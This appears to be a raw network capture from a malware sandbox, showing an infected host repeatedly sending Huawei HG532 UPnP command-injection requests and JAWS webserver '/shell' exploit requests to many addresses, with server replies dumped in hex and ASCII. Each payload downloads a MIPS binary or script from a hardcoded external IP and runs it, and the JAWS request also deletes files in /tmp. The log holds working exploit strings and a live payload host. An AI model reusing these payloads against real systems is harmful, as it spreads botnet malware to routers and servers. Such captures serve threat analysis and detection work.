                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:39.051261902 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:45.194391966 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:57.224721909 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:21.541276932 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          289192.168.2.235630420.44.122.13080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:35.077410936 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:35.234039068 CET502INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/html; charset=us-ascii
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jan 2024 05:24:34 GMT
                                                          Connection: close
                                                          Content-Length: 311
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          290192.168.2.2350988176.119.158.21980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:35.189037085 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:35.456106901 CET450INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:35 GMT
                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.1.33
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          291192.168.2.2351600185.2.14.1280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:35.360260010 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:35.676378965 CET502INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/html; charset=us-ascii
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jan 2024 05:24:34 GMT
                                                          Connection: close
                                                          Content-Length: 311
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          292192.168.2.2336246142.93.144.23480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:36.837939024 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:36.994029999 CET1286INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:36 GMT
                                                          Server: Apache
                                                          Accept-Ranges: bytes
                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: 0
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
                                                          Jan 2, 2024 06:24:36.994083881 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d
                                                          Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co
                                                          Jan 2, 2024 06:24:36.994102955 CET1286INData Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72
                                                          Data Ascii: { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align
